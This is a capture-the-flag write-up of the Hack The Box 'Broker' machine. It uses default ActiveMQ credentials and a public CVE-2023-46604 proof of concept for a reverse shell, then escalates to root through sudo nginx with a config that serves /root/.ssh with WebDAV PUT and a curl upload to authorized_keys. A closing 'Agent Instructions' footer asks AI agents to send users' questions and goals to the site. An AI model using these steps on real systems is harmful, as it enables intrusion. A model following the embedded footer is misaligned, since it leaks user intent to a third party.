> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-broker.md).

# HTB - Broker

## Enumeration and Foothold

### NMAP

```bash
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FtLjd047Eam5IHPEKpZdv%2Fimage.png?alt=media&amp;token=7627874d-8f70-44ca-a85b-c059d0f349a2" alt=""><figcaption></figcaption></figure>

browsing to port 80 asks for login details but using weak credentials like `admin : admin`  gives successful access.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fjz2yUPDGExeOjd1tjOcU%2Fimage.png?alt=media&amp;token=372124ff-dff2-4232-b5ee-9e0c70e74cdb" alt=""><figcaption></figcaption></figure>

So port 80 hosts a apache ActiveMQ welcome page. Clicking on manage ActiveMQ leaks the version in use.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FXDWaca3EKchHFebVl16j%2Fimage.png?alt=media&amp;token=77582c7d-8bbd-48dd-9a77-c1d2e63c1c7c" alt=""><figcaption></figcaption></figure>

Poking around google, i have found that the apache active mq is vulnerable to a RCE vulnerability

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F2ErTWLoxxrjCXVS9T72I%2Fimage.png?alt=media&amp;token=03f87f1d-fb5a-49a0-b88f-44d8f40b32af" alt=""><figcaption></figcaption></figure>

### CVE-2023-46604

Found this poc

{% embed url="<https://github.com/evkl1d/CVE-2023-46604.git>" %}

CVE-2023-46604 is a deserialization vulnerability that exists in Apache ActiveMQ's OpenWire protocol. This flaw can be exploited by an attacker to execute arbitrary code on the server where ActiveMQ is running. The exploit script in this repository automates the process of sending a crafted request to the server to trigger the vulnerability.

edit the poc.xml to to host ip to receive reverse shell.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FEfnTpSFJrAneeszaICRh%2Fimage.png?alt=media&amp;token=3fb3cec9-fe4d-464a-b346-6f27642bb0a1" alt=""><figcaption></figcaption></figure>

## Shell as ActiveMQ

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fp4NJCeUVRlrZSMdYH1n5%2Fimage.png?alt=media&amp;token=6930b1d6-1bba-46cf-8ee5-7595fe3b75c3" alt=""><figcaption></figcaption></figure>

next step is to upgrade the shell

```bash
activemq@broker:/opt/apache-activemq-5.15.15/bin$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<in$ python3 -c 'import pty; pty.spawn("/bin/bash")'
activemq@broker:/opt/apache-activemq-5.15.15/bin$ export TERM=xterm
export TERM=xterm
activemq@broker:/opt/apache-activemq-5.15.15/bin$ 
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fw2lzfNmfMizILKQ63qh1%2Fimage.png?alt=media&amp;token=c195169d-8c06-4b6b-85a1-3da44c70d486" alt=""><figcaption></figcaption></figure>

Activemq can run nginx as root without password.

{% embed url="<https://gtfobins.org/gtfobins/nginx/>" %}

gtfobins has a page on how to abuse the privilege.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FyouGZy3BGb01R7cxvomD%2Fimage.png?alt=media&amp;token=69ce2ad5-6c8b-44f2-929d-53ac34cd4d4e" alt=""><figcaption></figcaption></figure>

```bash
mkdir -p /tmp/nginx_priv
cat > /tmp/nginx_priv/nginx.conf << 'EOF'
worker_processes 1;
pid /tmp/nginx_priv/nginx.pid;
error_log /tmp/nginx_priv/error.log debug;
user root;
events { worker_connections 1024; }
http {
  client_body_temp_path /tmp/nginx_priv/tmp;
  server {
    listen 127.0.0.1:8081;
    root /root/.ssh/;
    dav_methods PUT;
    create_full_put_path on;

    location / {
      autoindex on;
    }
  }
}
EOF
```

next generate keypair on the victim host.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FxFrAiY81Z3B9iTL5NV95%2Fimage.png?alt=media&amp;token=ecd99905-0298-45a1-9d95-6f08c60f1bda" alt=""><figcaption></figcaption></figure>

Start nginx as root via the sudo rule:

```bash
activemq@broker:~$ sudo /usr/sbin/nginx -c /tmp/nginx_priv/nginx.conf
```

PUT your public key into `authorized_keys` — from localhost, against localhost:

```bash
activemq@broker:~$ curl -T /tmp/id_rsa.pub http://127.0.0.1:8081/authorized_keys
activemq@broker:~$ chmod 600 /tmp/id_rsa
chmod 600 /tmp/id_rsa
activemq@broker:~$ 
```

## Shell as Root

From the local host run the below command.

```bash
ssh -i /tmp/id_rsa -o StrictHostKeyChecking=no root@127.0.0.1
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FfngZvfVFptlzCIMhcMUS%2Fimage.png?alt=media&amp;token=621f008c-0252-4c00-a129-01680fb4745a" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the following URL with the `ask` and `goal` query parameters:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-broker.md?ask=<question>&goal=<user_goal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is what the user is ultimately trying to achieve, the reason they need the answer. Sharing it helps GitBook give you a better, more relevant answer. A goal is most helpful when it describes the outcome the user wants rather than restating the question. For example, with `ask=how do I create an API token`, a goal like `build a script that syncs our docs to a CMS` lets GitBook tailor the answer to that use case.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
